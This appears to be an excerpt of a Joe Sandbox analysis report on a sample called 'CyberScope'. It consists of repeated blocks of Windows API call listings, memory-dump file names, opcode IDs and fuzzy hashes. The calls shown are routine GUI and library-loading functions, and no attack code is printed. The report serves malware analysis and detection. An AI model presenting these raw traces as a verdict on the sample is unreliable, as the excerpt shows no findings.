                                                                                    • Opcode Fuzzy Hash: 354148ff5fa1939ffa476fa396f219c3ebcf45915485da713abce538300250f0
                                                                                    • Instruction Fuzzy Hash: A9F0A476944A006BD22267B5BC0AF6E266A9FF1771B29841CF934922D1EF31CA4245A1
                                                                                    APIs
                                                                                      • Part of subcall function 00191F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00191F87
                                                                                      • Part of subcall function 00191F2D: SelectObject.GDI32(?,00000000), ref: 00191F96
                                                                                      • Part of subcall function 00191F2D: BeginPath.GDI32(?), ref: 00191FAD
                                                                                      • Part of subcall function 00191F2D: SelectObject.GDI32(?,00000000), ref: 00191FD6
                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002294AA
                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 002294BE
                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002294CC
                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 002294DC
                                                                                    • EndPath.GDI32(?), ref: 002294EC
                                                                                    • StrokePath.GDI32(?), ref: 002294FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                    • String ID:
                                                                                    • API String ID: 43455801-0
                                                                                    • Opcode ID: 44aa46391754bb69e3d9101bc6ce6d1af0749deb216cb20838e36181b2a1fec2
                                                                                    • Instruction ID: 4020d7e710a115de8bf7975cbe1cd513725a40c8d25e1dbecb730b764fc1532b
                                                                                    • Opcode Fuzzy Hash: 44aa46391754bb69e3d9101bc6ce6d1af0749deb216cb20838e36181b2a1fec2
                                                                                    • Instruction Fuzzy Hash: 5111C97600011DBFDF129F90EC89EAA7F6DEB08364F04C011FA195A1B1C771AE66DBA0
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 001F5B7C
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 001F5B8D
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001F5B94
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 001F5B9C
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 001F5BB3
                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 001F5BC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: ee32f5dec10fdb416d23e4b6f3c3304b1248313afe837aecd20ee5b415f8bc9f
                                                                                    • Instruction ID: 0de20fb13f9f780e06cb246cbe0804e9100da7442399c0dd831e06f44a85827b
                                                                                    • Opcode Fuzzy Hash: ee32f5dec10fdb416d23e4b6f3c3304b1248313afe837aecd20ee5b415f8bc9f
                                                                                    • Instruction Fuzzy Hash: F8014F75E00718BBEB109BE5AC49E5EBFB9EB48751F104065FB09A7291D6709D01CBA0
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001932AF
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 001932B7
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001932C2
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001932CD
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 001932D5
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001932DD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: 3835edcaa797d8cd9b1240961104eda12ff817475706d30700a37423df50c5bc
                                                                                    • Instruction ID: 7966bbea3cccfc2afac738ba70e1ef3f6ac23e8b7992e4ef390c84e6c88b26d3
                                                                                    • Opcode Fuzzy Hash: 3835edcaa797d8cd9b1240961104eda12ff817475706d30700a37423df50c5bc
                                                                                    • Instruction Fuzzy Hash: F60167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?), ref: 001D34EF
                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 001D3506
                                                                                    • GetWindowDC.USER32(?), ref: 001D3512
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 001D3521
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 001D3533
                                                                                    • GetSysColor.USER32(00000005), ref: 001D354D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                    • String ID:
                                                                                    • API String ID: 272304278-0
                                                                                    • Opcode ID: 1275808f285c8f67667b940f73ff49d9e2bb7612242b8c23e6e65d67628b3d99
                                                                                    • Instruction ID: a88834cf0e4ba4aa3fea63c09a6b404d6067e4796d88ed0d319006128ce3e567
                                                                                    • Opcode Fuzzy Hash: 1275808f285c8f67667b940f73ff49d9e2bb7612242b8c23e6e65d67628b3d99
                                                                                    • Instruction Fuzzy Hash: 73014B31500105FFDB605FA4EC08BE97BB5FB04321F510161F92AA22A0CB712E62AB11
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F21CC
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 001F21D8
                                                                                    • CloseHandle.KERNEL32(?), ref: 001F21E1
                                                                                    • CloseHandle.KERNEL32(?), ref: 001F21E9
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F21F2
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F21F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: 25015229cdd7e8f1d7f6f45e5015a139fa3edb59aea2621503174e9692be8119
                                                                                    • Instruction ID: a67646fa46b5d2fbdb2a3bd6ba3dea66bb09d364c3f4c6a95f61e80d4c536e16
                                                                                    • Opcode Fuzzy Hash: 25015229cdd7e8f1d7f6f45e5015a139fa3edb59aea2621503174e9692be8119
                                                                                    • Instruction Fuzzy Hash: 2BE0E57A004105BBDB115FE1FC0D94ABF39FF49322B105220F22982470CB329432DF90
                                                                                    APIs
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0021B903
                                                                                      • Part of subcall function 001941EA: _wcslen.LIBCMT ref: 001941EF
                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0021B998
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0021B9C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                    • String ID: <$@
                                                                                    • API String ID: 146682121-1426351568
                                                                                    • Opcode ID: 7e905fc0e142e008745d09a30be771175ac33f27dc751d0565b3e579d363833a
                                                                                    • Instruction ID: 0e9d8b1a8d2e91ca8f54f7a17dde8a79719f787493272ba796ac9f4cd38f588f
                                                                                    • Opcode Fuzzy Hash: 7e905fc0e142e008745d09a30be771175ac33f27dc751d0565b3e579d363833a
                                                                                    • Instruction Fuzzy Hash: 81715774A10219DFCF15EF64C494A9EBBF4BF18310F048499E856AB262CB74ED86CF90
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001F7B6D
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001F7BA3
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001F7BB4
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001F7C36
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: 5eb35a92d08f54a2075aff284c39acdaba9e01c58c009d81372ab8e0132b8c8b
                                                                                    • Instruction ID: cc55fc8e084cc401a8b0d0362259162f3dfb6a4c22ed51154d44fc7add47f9ab
                                                                                    • Opcode Fuzzy Hash: 5eb35a92d08f54a2075aff284c39acdaba9e01c58c009d81372ab8e0132b8c8b
                                                                                    • Instruction Fuzzy Hash: 7241A4B1604209EFDB15CF64D884AAA7BB9EF44314F1480ADEE09DF285D7B1DD44CBA0
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002248D1
                                                                                    • IsMenu.USER32(?), ref: 002248E6
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0022492E
                                                                                    • DrawMenuBar.USER32 ref: 00224941
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                    • String ID: 0
                                                                                    • API String ID: 3076010158-4108050209
                                                                                    • Opcode ID: 912c38d3acfbd8f85f7274e7fc430f9c7e265e86b10daad19e52e54cf064f215
                                                                                    • Instruction ID: 52594831b38e7fdb72fb25da40f09e1b3913b47d1a111f1ebc596893ec7ee6c6
                                                                                    • Opcode Fuzzy Hash: 912c38d3acfbd8f85f7274e7fc430f9c7e265e86b10daad19e52e54cf064f215
                                                                                    • Instruction Fuzzy Hash: E0418C78A1121AFFDB10DF91E884AAA7BB9FF05324F444129F94597250C370ADA5CF60
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 001F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 001F4620
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001F27B3
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001F27C6
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 001F27F6
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 2081771294-1403004172
                                                                                    • Opcode ID: 789f3c3a9e6bb916f8f83f66f0bd32aa04bd4288a9d8330dc3abf8ccf6788047
                                                                                    • Instruction ID: 7dbcf01c2be2947debcdb7cdaa0c3fe09bc9d9500d9285ba482acf29c82b2e27
                                                                                    • Opcode Fuzzy Hash: 789f3c3a9e6bb916f8f83f66f0bd32aa04bd4288a9d8330dc3abf8ccf6788047
                                                                                    • Instruction Fuzzy Hash: EA210B71D00108BFDB19ABA4DC89CFFB7B8DF563A4F104129F511A71E1CB38590AD650
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00223A29
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00223A30
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00223A45
                                                                                    • DestroyWindow.USER32(?), ref: 00223A4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 3529120543-1011021900
                                                                                    • Opcode ID: 802468aeb229e1f0306d96c6bbb3b46aae8937acfb84ecb3a8000aaf9f1f973b
                                                                                    • Instruction ID: 068b7746758b2ca590e01a8a2b2a40c5e943a8c76dda9d244a67daa673743568
                                                                                    • Opcode Fuzzy Hash: 802468aeb229e1f0306d96c6bbb3b46aae8937acfb84ecb3a8000aaf9f1f973b
                                                                                    • Instruction Fuzzy Hash: C421CF72A20216BBEB10CFA4EC84FBB77A9EB49364F105224FA9192090C375CDA19760
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • GetCursorPos.USER32(?), ref: 00229A5D
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00229A72
                                                                                    • GetCursorPos.USER32(?), ref: 00229ABA
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00229AF0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID: (&
                                                                                    • API String ID: 2864067406-1801568203
                                                                                    • Opcode ID: 4e603dc7a77e147fc6d80be80af73320547a2a6547ccee6d5ef118cc8353704a
                                                                                    • Instruction ID: 5efff2cf9f3cb606c44fb65c2d10d54838d4585e22b4298d575a450078656101
                                                                                    • Opcode Fuzzy Hash: 4e603dc7a77e147fc6d80be80af73320547a2a6547ccee6d5ef118cc8353704a
                                                                                    • Instruction Fuzzy Hash: F121FE30610228FFCF258F98E848EFE3BB9EB49310F504065F9058B1A1CB7199A1DF60
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00191AF4
                                                                                    • GetClientRect.USER32(?,?), ref: 001D31F9
                                                                                    • GetCursorPos.USER32(?), ref: 001D3203
                                                                                    • ScreenToClient.USER32(?,?), ref: 001D320E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                    • String ID: (&
                                                                                    • API String ID: 4127811313-1801568203
                                                                                    • Opcode ID: bacccb4a7841f9a1f9ca3e4195ef852d9218378898ed196e52f36de719ea004f
                                                                                    • Instruction ID: e764780a09ab2eef3f0a73d415ffb87040f6254ee1b4363ebb5436ecd4fd28a6
                                                                                    • Opcode Fuzzy Hash: bacccb4a7841f9a1f9ca3e4195ef852d9218378898ed196e52f36de719ea004f
                                                                                    • Instruction Fuzzy Hash: EA113A32A0105AFBDF10DFA4E9499FE77B8EB05340F100452E912E7240C770BA92CBA5
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001B508E,00000003,?,001B502E,00000003,002598D8,0000000C,001B5185,00000003,00000002), ref: 001B50FD
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B5110
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,001B508E,00000003,?,001B502E,00000003,002598D8,0000000C,001B5185,00000003,00000002,00000000), ref: 001B5133
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 3009e42821977995eebe05fd9c018f73c3c0b85551a51a02dae24293ccfc728e
                                                                                    • Instruction ID: 4dadc6e41599b3888bc7fcc92595118b8039d37d9798d5c78a74722623c13b4e
                                                                                    • Opcode Fuzzy Hash: 3009e42821977995eebe05fd9c018f73c3c0b85551a51a02dae24293ccfc728e
                                                                                    • Instruction Fuzzy Hash: 5DF06870900208BBDB219FD4EC4DBDDBFB5EF08752F040064F809A21A0DB755D51CA95
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32 ref: 001EE785
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001EE797
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 001EE7BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                    • API String ID: 145871493-2590602151
                                                                                    • Opcode ID: 4d92ce691fd2a54945b9872ccaa32d7b35645beee7f9d11b40183c5ab7b05ca7
                                                                                    • Instruction ID: 0a47c1082cedba5c7c2fe677f8cac31b8396b08e241f328f49bc553e4c86b065
                                                                                    • Opcode Fuzzy Hash: 4d92ce691fd2a54945b9872ccaa32d7b35645beee7f9d11b40183c5ab7b05ca7
                                                                                    • Instruction Fuzzy Hash: 9BF02B71C15D91AFD73557615C88EAD76A86F25701F1205A8FC49F2050DB30CD59CA94
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0019668B,?,?,001962FA,?,00000001,?,?,00000000), ref: 0019664A
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0019665C
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,0019668B,?,?,001962FA,?,00000001,?,?,00000000), ref: 0019666E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 145871493-3689287502
                                                                                    • Opcode ID: 6b086d8bdacf078b5e90d448c2ca0b6548e8be25dcf3cd951598dfdf647a466a
                                                                                    • Instruction ID: 500bc34472c9f74979b95695bf20f82f39daa82308856131b8c527d850ecdaa0
                                                                                    • Opcode Fuzzy Hash: 6b086d8bdacf078b5e90d448c2ca0b6548e8be25dcf3cd951598dfdf647a466a
                                                                                    • Instruction Fuzzy Hash: 65E0CD366016327797312765BC0CB5E65289F93F26B050115FC04D2100EF68CC1280F4
                                                                                    APIs
